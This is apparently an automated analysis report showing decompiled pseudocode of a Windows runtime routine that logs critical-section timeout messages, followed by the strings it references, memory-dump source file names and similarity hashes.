                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.473875335.0000000004BBB000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000009.00000002.473904145.0000000004BBF000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                                                                                          • Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
                                                                                                                          • Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                                                                                          • Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%